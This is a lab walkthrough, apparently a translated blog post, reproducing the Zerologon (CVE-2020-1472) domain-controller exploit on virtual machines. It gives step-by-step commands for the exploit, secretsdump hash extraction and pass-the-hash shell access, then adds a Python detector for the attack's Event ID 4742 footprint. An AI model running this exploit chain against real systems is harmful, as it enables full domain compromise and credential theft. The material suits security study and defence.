PJzhang: Reproducing CVE-2020-1472, the Microsoft NetLogon privilege escalation vulnerability


Morning~~~

Everything is done on virtual machines.

Install Windows 2008 R2

Check the server's IP

Local Area Connection properties: uncheck IPv6, set the IP to 192.168.43.158, subnet mask 255.255.255.0, gateway 192.168.43.1, DNS 192.168.43.1

Open Initial Configuration Tasks, add a server role, and select Active Directory Domain Services

Run dcpromo to start the Active Directory Domain Services Installation Wizard, create a new domain in a new forest, enter the domain name www.pjzhang.com, set the password 123.aaa, and restart the computer

Install Windows 7

Local Area Connection properties: uncheck IPv6, set the IP to 192.168.43.241, subnet mask 255.255.255.0, gateway 192.168.43.1, DNS 192.168.43.158

Computer properties, Change settings, change the computer name, under "Member of domain" enter www.pjzhang.com, account/password administrator/123.aaa, and restart the computer

https://github.com/SecuraBV/CVE-2020-1472

git clone https://github.com/SecuraBV/CVE-2020-1472.git

Kali Linux attack machine

apt-get install python3-pip

pip3 install -r requirements.txt

Check the Windows 2008 R2 computer name under Computer properties

python3 zerologon_tester.py WIN-U2A9B1M49R3 192.168.43.158

It prints: Success! DC can be fully compromised by a Zerologon attack.

https://github.com/dirkjanm/CVE-2020-1472

git clone https://github.com/dirkjanm/CVE-2020-1472.git

python3 cve-2020-1472-exploit.py WIN-U2A9B1M49R3 192.168.43.158

This fails with an error:

Unexpected error: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'.

git clone https://github.com/SecureAuthCorp/impacket

cd impacket/

pip3 install . (the dot means the current directory)

python3 cve-2020-1472-exploit.py WIN-U2A9B1M49R3 192.168.43.158

It prints Exploit complete!, and the domain controller's password has been reset to empty

cd impacket/examples

python3 secretsdump.py WIN-U2A9B1M49R3\$@192.168.43.158 -no-pass

Note the backslash in the command above

This yields Administrator:500:aad3b435b51404eeaad3b435b51404ee:28553a7f5b14b5e60ba4d7cce9045e3d:::

cd impacket/examples

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:28553a7f5b14b5e60ba4d7cce9045e3d Administrator@192.168.43.158

This connects to the domain controller and drops into a C:\> prompt

It shows:

C:\>whoami

www\administrator
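From the defender's side, the step above that resets the DC's password over an unauthenticated Netlogon session leaves a footprint in the Windows Security log: a computer-account change (Event ID 4742) performed by ANONYMOUS LOGON with a changed "Password Last Set" value. The following is an added example, not part of the original post or of either exploit repository; the one-JSON-record-per-line layout and the sample records are constructed for the example.

```python
# Added example (not from the original post): flag Security-log records that
# match the Zerologon footprint, a machine-account password reset (EventID
# 4742) whose subject is ANONYMOUS LOGON (well-known SID S-1-5-7).
# The record layout (one JSON object per line) is an assumption for this demo.
import json

ANONYMOUS_SID = "S-1-5-7"  # well-known SID for ANONYMOUS LOGON


def is_zerologon_like(event: dict) -> bool:
    """True when a 4742 event was raised by ANONYMOUS LOGON against a machine
    account ($ suffix) and the password field actually changed ("-" means
    unchanged in the 4742 layout)."""
    if event.get("EventID") != 4742:
        return False
    anonymous = event.get("SubjectUserSid", "") == ANONYMOUS_SID
    machine_acct = event.get("TargetUserName", "").endswith("$")
    pw_changed = event.get("PasswordLastSet", "-") != "-"
    return anonymous and machine_acct and pw_changed


def scan(lines):
    """Parse one JSON record per line; return the machine accounts flagged."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a malformed record rather than abort the scan
        if is_zerologon_like(ev):
            hits.append(ev["TargetUserName"])
    return hits


# Constructed sample log: a routine change by Administrator, the anonymous
# password reset of the DC machine account from the walkthrough, and an
# unrelated logon event that must not trigger.
SAMPLE_LOG = """
{"EventID": 4742, "SubjectUserSid": "S-1-5-21-1-2-3-500", "SubjectUserName": "Administrator", "TargetUserName": "WIN7-CLIENT$", "PasswordLastSet": "-"}
{"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WIN-U2A9B1M49R3$", "PasswordLastSet": "9/15/2020 10:31:07 AM"}
{"EventID": 4624, "SubjectUserSid": "S-1-5-7", "TargetUserName": "WIN-U2A9B1M49R3$"}
"""

if __name__ == "__main__":
    for name in scan(SAMPLE_LOG.splitlines()):
        print(f"ALERT: {name} password reset by ANONYMOUS LOGON (EventID 4742)")
```

On a patched DC the same step is refused and, with Netlogon event logging enabled, shows up as denied-connection events instead, so the 4742 match is the signal that the reset actually succeeded.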
